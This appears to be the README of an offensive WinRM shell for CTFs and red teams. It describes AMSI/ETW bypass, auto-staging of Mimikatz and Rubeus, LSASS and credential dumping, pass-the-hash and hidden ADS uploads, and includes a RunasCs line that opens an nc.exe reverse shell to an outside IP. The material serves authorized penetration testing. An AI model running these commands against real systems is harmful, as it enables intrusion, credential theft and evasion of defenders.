Advanced WinRM Shell for CTFs, Red Teams, and Offensive Research AWINRM is an operator focused WinRM framework under active development. Features, macros, and internal behavior may evolve as the tool matures.
-informational){kind=icon}
-lightgrey){kind=icon}
Alpha release — experimental automation modules.
Use only where you have explicit written authorization.
█████╗ ██╗ ██╗██╗███╗ ██╗██████╗ ███╗ ███╗
██╔══██╗██║ ██║██║████╗ ██║██╔══██╗████╗ ████║
███████║██║ █╗ ██║██║██╔██╗ ██║██████╔╝██╔████╔██║
██╔══██║██║███╗██║██║██║╚██╗██║██╔══██╗██║╚██╔╝██║
██║ ██║╚███╔███╔╝██║██║ ╚████║██║ ██║██║ ╚═╝ ██║
╚═╝ ╚═╝ ╚══╝╚══╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝
AWINRM OPERATOR SHELL
AWINRM was built from real operator struggles inside enterprise Active Directory environments.
While traditional WinRM tooling works, real redteam operations face friction:
- Broken or slow uploads for large binaries
- In memory execution blocked by AMSI/ETW
- Instability around PowerShell language modes
- Weak automation for enumeration and credential gathering
- IPv6 lateral movement poorly supported
- Repetitive staging steps harming OPSEC
AWINRM directly addresses these issues through its operator centric workflow system, staging subsystem, and built-in bypass modules.
Designed for:
- CTF challenge assault paths (Kerberoast → lateral movement → LSASS access)
- HTB Pro Labs enterprise engagements
- High fidelity red-team simulations
- Automated AMSI bypass and ETW disruption
- Reliable file staging for large binaries
- Architecture-aware tooling (x86/x64)
- Command macros for AD recon and exploitation
- SOCKS proxy tunneling for pivot operations
- Auto-loot heuristics for credentials, flags, tokens
- Optional banner-based situational awareness
- Stealth upload mode with ADS storage support
- Built-in IPv6 probing and fallback support
- Workflow persistence and command history logging
Output is stored locally in the loot/ directory for offline analysis.
AWINRM features two situational awareness modes:
Minimal banner (default):
• Fast execution in CTF environments
• Summarizes privileges, EDR state, local flags
Expand banner mode:
Provides high depth assessment including:
- Live SQL/MSSQL instance detection
- Kerberos misconfiguration checks
- Patch state indicators
- Lateral movement suggestions
- Trust relationship scan summary
- Privilege escalation scoring
Run expanded banner like this:
ruby bin/evil-ctf.rb -i 10.10.10.10 -u Administrator -p Passw0rd! --banner expandedOperators receive active decision guidance for next-step exploitation.
AWINRM provides automated in memory defenses against common blue-team controls:
- AMSI bypass using runtime patching
- ETW neutralization against script tracing
- Avoids touching disk or modifying registry
- Supports fallback manual execution
- Updated for modern Windows 10 / Windows Server builds
Execution can be toggled or invoked by operator preference.
Automatically deploys common offensive tools for credential harvesting, domain enumeration, and privilege escalation.
Supported tool families:
- SharpHound
- Rubeus
- PowerView / PowerSploit modules
- Mimikatz
- WinPEAS
- Seatbelt
- Inveigh
- ProcDump
- RunasCs
- SSH / tunneling helpers
- Nishang scripts
RunasCs is a C# implementation of RunAs for user impersonation and UAC bypass. After staging RunasCs.exe to the remote host, you can use it as follows:
Spawn Process with Network Credentials:
.\RunasCs.exe -d domain.tld -l 8 'username' 'password' 'C:\Windows\Temp\nc.exe 10.6.6.6 443 -e powershell.exe'Spawn Process with Logon:
.\RunasCs.exe username_here password_here powershell.exe -r RHOST:RPORTSee the RunasCs GitHub for more usage details and options.
Features:
- Architecture aware staging
- Chunked or XOR-encoded uploads
- Alternate Data Stream support
- Randomized filenames for OPSEC
- Tool registry with version mapping
Artifacts stored in:
loot/creds.json
loot/loot.txt
Streamlined workflows to accelerate exploitation:
- Kerberoasting automation
- Domain recon bundles
- Credential and token dumping
- LSASS extraction and secure download
- SharpHound collection
- SOCKS tunneling initialization
- Local and domain privilege assessment
- Automated discovery of lateral access paths
Designed for both rapid CTF wins and full domain takeover scenarios.
AWINRM requires Ruby 3.0+ and Bundler.
bundle install# Gemfile (updated for Ruby 3.2+)
source 'https://rubygems.org'
gem 'winrm', '~> 2.3.9' # WinRM client, fully compatible with Ruby 3.x
gem 'socksify', '~> 1.8.1' # TCP‑Socks proxy support
gem 'concurrent-ruby', '~> 1.2.0'
gem 'net-smtp', '~> 0.3.4'
gem 'rubyzip', '~> 2.0'
# Bundler itself
gem 'bundler', '~> 2.4.0'
Ruby’s standard library covers the remaining imports (optparse, ipaddr, socket, fileutils, etc.).
ruby bin/evil-ctf.rb -i <target_ip> -u <username> -p <password>AWINRM supports direct connections to Windows hosts over IPv6. For reliable IPv6 connectivity, follow these steps:
-
Map IPv6 Address to Hostname Add the IPv6 address and desired hostname to
/etc/hostsusing the built-in CLI option:sudo ruby evil-ctf.rb --ipv6 <IPv6_address>,<hostname> # Example: sudo ruby evil-ctf.rb --ipv6 fd00:1234:5678::10,Old-W10
This will append a line to
/etc/hostsmapping the IPv6 address to the hostname (with backup and idempotency). -
Connect Using the Hostname After mapping, connect to the target using the hostname:
ruby evil-ctf.rb -i Old-W10 -u <username> -p <password>
AWINRM will resolve the hostname to the IPv6 address and connect over IPv6 if the target is listening.
-
Verifying IPv6 Connection
- On the Windows target, run:
netstat -an | findstr 5985orGet-NetTCPConnection | Where-Object { $_.LocalPort -eq 5985 }and look for connections from your Linux IPv6 address.
- On Linux, run:
ss -6 dst <IPv6_address>netstat -an | grep <IPv6_address>during the connection attempt.
- On the Windows target, run:
Notes:
- If you use a zone index (e.g.,
fd00:1234:5678::10%enp130s0), only the address part is mapped in/etc/hosts. - You can repeat the mapping for multiple hosts as needed.
ruby evil-ctf.rb -i HOST -u USER -H NTLM_HASHruby evil-ctf.rb -i HOST --ssl -u USER -p PASSruby evil-ctf.rb -i HOST --socks 127.0.0.1:1080 -u USER -p PASStool all
dump_creds
dom_enumEvilCTF supports uploading files directly to Windows Alternate Data Streams (ADS) for stealth and OPSEC. This allows you to store data in hidden streams attached to files.
- Start a session:
ruby evil-ctf.rb -i <target_ip> -u <username> -p <password>
- Enter the file operations menu:
fileops - Choose "Upload file" and specify your local file.
- For the remote destination, use the format:
This uploads your file into the ADS named
C:\Users\Public\target.txt:adsnameadsnameattached totarget.txt.
On the target system, use PowerShell:
Get-Content -Path 'C:\Users\Public\target.txt:adsname'For binary files:
[System.IO.File]::ReadAllBytes('C:\Users\Public\target.txt:adsname')Or download the ADS using EvilCTF by specifying the full ADS path in the fileops menu.
Note: The base file (e.g.,
target.txt) must exist before uploading to its ADS.
Basic authentication:
ruby bin/evil-ctf.rb -i 10.10.10.10 -u Administrator -p Welcome1!Pass-the-Hash:
ruby evil-ctf.rb -i HOST -u USER -H NTLM_HASH)TLS encrypted transport:
ruby evil-ctf.rb -i HOST --ssl -u USER -p PASS)SOCKS proxy pivot:
ruby evil-ctf.rb -i HOST --socks 127.0.0.1:1080 -u USER -p PASS)Execute staging macro:
tool allDump credentials:
dump_credsDomain reconnaissance:
dom_enumOperators can chain execution across multiple remote hosts for campaign automation.
AWINRM
bin/evil-ctf.rb CLI entry point
lib/evil_ctf/banner.rb Banner and recon information
lib/evil_ctf/enums.rb Enumeration systems
lib/evil_ctf/session.rb Interactive shell and workflow engine
lib/evil_ctf/tools.rb Tool registry and auto staging rules
lib/evil_ctf/uploader.rb File transfer implementation
loot/ Local credential and artifact storage
profiles/ YAML configuration for stealth workflows
README.md Framework documentation
LICENSE Legal terms
| Tactic | Technique | ID | Purpose in AWINRM |
|---|---|---|---|
| Execution | PowerShell | T1059.001 | Remote in memory command execution |
| Execution | In-Memory Execution | T1620 | Run payloads without touching disk |
| Lateral Movement | WinRM | T1021.006 | Movement across Active Directory hosts |
| Credential Access | Credential Dumping | T1003 | Extract stored secrets for escalation |
| Credential Access | LSASS Memory Dumping | T1003.001 | Token/credential recovery from LSASS |
| Credential Access | Pass-the-Hash | T1550.002 | Authenticate without cleartext passwords |
| Credential Access | Kerberoasting | T1558.003 | Harvest TGS tickets for offline cracking |
| Discovery | Account Discovery | T1087 | Identify exploitable users and roles |
| Discovery | Network/Host Discovery | T1016 | Identify lateral access opportunities |
| Command and Control | Application Protocol: HTTPS | T1071.001 | Covert, encrypted operator traffic |
| Defense Evasion | AMSI Bypass | T1562.001 | Block script scanning and signature checks |
| Defense Evasion | ETW Disable | T1562.002 | Prevent telemetry capture/analysis |
Enhancements are welcome on:
- stealth workflow automation
- advanced credential extraction techniques
- stability enhancements
- tools to be autostaged
All pull requests must include full documentation and test coverage.
AWINRM draws initial inspiration from the WinRM interface established by
Evil-WinRM by @Hackplayers.
This project expands upon the baseline WinRM interaction model, adding modular tooling, macro workflows, AMSI/ETW bypass automation, and operator-focused enhancements.
Credit is due to:
- Original Evil-WinRM authors
- BloodHound / SharpHound developers
- GhostPack maintainers
- PowerShellMafia (PowerView/PowerSploit)
- Inveigh and Nishang maintainers
- Sysinternals (ProcDump)
AWINRM is provided strictly for:
- authorized penetration testing
- approved red-team missions
- CTF participation
- security improvement research
Unauthorized deployment on systems without explicit permission is illegal.
All responsibility for ethical and lawful use lies solely with the operator.